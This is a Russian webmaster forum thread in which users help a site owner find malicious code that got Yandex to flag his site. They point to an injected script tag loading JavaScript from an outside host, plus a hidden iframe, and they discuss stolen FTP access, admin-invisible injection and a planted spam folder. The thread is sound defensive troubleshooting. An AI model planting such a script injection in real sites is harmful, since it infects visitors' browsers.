Обнаружен вредоносный код. Вердикт Поведенческий анализ

Сообщений: 222 Регистрация: Сен 2011

23 Марта 2012 14:57

Здравствуйте Уважамые форумчане!
В вебмастере яндекса сайт помечен: обнаружен опасный код
Ни кликандеров, ни тизеров ничего никогда не ставил. Единственное, что стоит - реклама гугла
отправил повторную заявку на рассмотрение, ответили, что код ещё присутствует.
траф упал резко, каждому пользователю выводят предупреждение, что сайт заражён
страницы с вредоносным кодом:
http://cdelayremont.ru/vidy-zhalyuzi-dlya-okon
http://cdelayremont.ru/montazh-kanalizacii-svoimi-rukami
Спасибо:)
зы. раздел вроде тот

mayki

Сообщений: 294 Регистрация: Апр 2010

23 Марта 2012 15:26

Пробил страницу через поиск, предупреждения уже нет, при входе на сайт тоже.
Ивеняюсь, не углядел, есть предупреждение, но очень мелким шрифтом сразу не заметил.

Изменено: mayki - 23 Марта 2012 15:29

Информация для новичков о торговле на форекс http://forexluck.ru - рейтинг брокеров, бесплатные советники и индикаторы, стратегии трейдинга.

Yapy

Сообщений: 583 Регистрация: Дек 2011

23 Марта 2012 15:55

Что это?

Код
<script type="text/javascript" src='http://keywork.keycf.net/bob/js/mootols.js'></script>

И iframe там стоит тоже... smile:confused:

Изменено: Yapy - 23 Марта 2012 16:10

О сколько нам открытий чудных готовит продвиженья путь:
И Google, сын ошибок трудных, и Yandex, парадоксов друг :)
Дешёвый хостинг для новичков и про

Morrich

Сообщений: 222 Регистрация: Сен 2011

23 Марта 2012 17:45

Цитата

Yapy пишет:
Что это?

Код
<script type="text/javascript" src='http://keywork.keycf.net/bob/js/mootols.js'></script>

И iframe там стоит тоже... smile:confused:

убрал, спасибо!

откуда только взялось это чудо.. smile:confused:

Yapy

Сообщений: 583 Регистрация: Дек 2011

23 Марта 2012 18:39

Цитата
Morrich пишет: убрал, спасибо!

Перешёл на сайт: всё на месте: как iframe, так и javascript.

Цитата
Morrich пишет: откуда только взялось это чудо..

Вероятно, кто-то завладел доступом по фтп к вашему сайту. Проверьте логи фтп-доступа, если такая возможность имеется. Смените пароли.Или, завладели доступом к админке/управлению хостингом. Сделать проверку тоже лишним не будет. Так как если доступ всё еще есть у злоумышленника, то вредоносный код может появиться вновь в любой момент.

Макс

Сообщений: 6 Регистрация: Апр 2010

23 Марта 2012 18:40

До сих пор стоит! Тлько что зашел на указанные страницы, анти-вирус ругается.

thyssen

Сообщений: 44 Регистрация: Окт 2011

23 Марта 2012 19:17

Ага это чудо на месте стоит, script type="text/javascript" src='keywork.keycf.net/bob/js/mootols.js, на него ругаются антивирусы.

Детали заражения

[TABLE]

[TR][TD]URL:http://keywork.keycf.net/bob/js/mootols....[/TD][/TR]

[TR][TD]Процесс:C:\Program Files\Opera\opera.exe[/TD][/TR]

[TR][TD] Инфекция: URL:Mal[/TD][/TR]

[/TABLE]

Смотрите в футере.

Изменено: thyssen - 23 Марта 2012 19:23

Александр Зуев

Сообщений: 3 Регистрация: Фев 2012

23 Марта 2012 20:23

У меня такая проблема из-за рекламы от ТАК.РУ была

Morrich

Сообщений: 222 Регистрация: Сен 2011

23 Марта 2012 22:10

хах, когда залогинен админом, он не виден
выхожу - появляется
в футере всё удалил, теперь не знаю что искать:confused:

Yapy

Сообщений: 583 Регистрация: Дек 2011

#10

24 Марта 2012 00:41

Цитата
Morrich пишет: хах, когда залогинен админом, он не виден выхожу - появляется

Значит надо искать в php условия вида

Код
if($user_id!=1) {код;}

Готов попробовать помочь безвозмездно.
Пишите в ЛС, там могу дать ICQ.

margo

Сообщений: 657 Регистрация: Дек 2011

#11

24 Марта 2012 00:47

Аваст срабатывает на странице, кричит как потерпевший...

Олег Сообщений: 96 Регистрация: Янв 2012	#12 24 Марта 2012 02:07 Добрый вечер! Вчера проверил сайт на проиндексированность гугла и заметил такую ерунду... Кто-то у меня на сайте создал папку phpsmtp (так как сайт на джумла) в разделе libraries с фейком гугла! И страницы сгенерированные в этом разделе были посвящены андройду и всяким мобильникам, хотя сайт совершенно другой тематики. Так ещё и прогон по профилям форумов сделали, в общей сложности нашёл примерно 2600 ссылок на этот раздел сайта! Не знаю как я ещё бана не поймал от Яндекса... Снёс папку и с помощью 301 редиректа перенаправил ссылки на главную страницу, правильно ли я сделал? Или может надо было написать в Яндекс? Кстати при входе в пенель управления хостингом появляется сообщение, что кто-то завладел паролями к фтп и в связи с этим пароли были изменены... Менял 1000+ раз и это сообщение не пропадает! А винду переустанавливать очень проблематично... P.S.: Точно такую же папку нашел (с помощью поиска яндекса и гугла) ещё только на одном сайте... Прогоны были сделаны 23 февраля. ХЗ что и думать, как раз в этот момент заказывал 3 прогона от пользователей супра.

Похожие темы:

02.12.2017 09:39	Обнаружены нарушения или проблемы с безопасностью
28.05.2015 09:50	Яндекс: На сайте обнаружены скрытые ссылки
23.05.2015 18:50	Яндекс нашел вредоносный код
11.04.2014 23:06	Вредоносный код
25.08.2013 21:45	Вредоносный код на сайте

Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)

Новые темы	Объявления	Свободное общение
10:09 Dao.AD: Монетизация и покупка Push/Pops/Inpage и Video трафика! 21:07 Взрывной рост роботности в Метрике 18:33 Trafee.com – эффективная монетизация вашего дейтинг трафика 15:41 Adtrafico - Правильная партнёрская сеть под бурж трафик 22:12 Stixi.ru. и stixi.com 20:30 LOSPOLLOS.COM - Конвертим по рецепту Хайзенберга. Dating, Mainstream, Binary Options 16:45 Adfinity - Ваш надежный партнер в монетизации трафика	10:58 BIGPROXY.SHOP - Резидентные Ротационные Backconnect Proxy USA EUROPA MIX [Безлимитный трафик] 10:17 Размещу ссылки/статьи на ваш сайт \| Рост ИКС \| XRumer 23.0.4 StrongAI 22:12 BestX24 - быстрый и безопасный обменник криптовалют и электронных денежных средств 18:06 Coin Click.cc - Быстрый и надежный обмен электронных валют в два клика 05:50 LunaProxy дешевый глобальный резидентный прокси $0,77/ГБ Ротирующийся прокси\|Собственный IP\|Безлимитный план 16:11 Google Voice - OLD аккаунты "SMS и звонки" 15:32 Sms.chekons.com - получения SMS на реальные номера USA, Sms.chekons.com - получения SMS на реальные номера USA	23:55 Точные прогнозы на футбол 20:09 Сколько сейчас стоит наполнение ИМ? 12:43 Куплю проигрышные букмекерские аккаунты 04:33 Половина скидок на распродажах — фейк 07:53 НейроБабушка наказывает мошенников 19:59 Осталось 3-5 месяцев до блокировки YouTube в России, — заявил Клименко 19:57 Пятница 13-ое: VK принял радикальное решение и закрыл доступ к порно контенту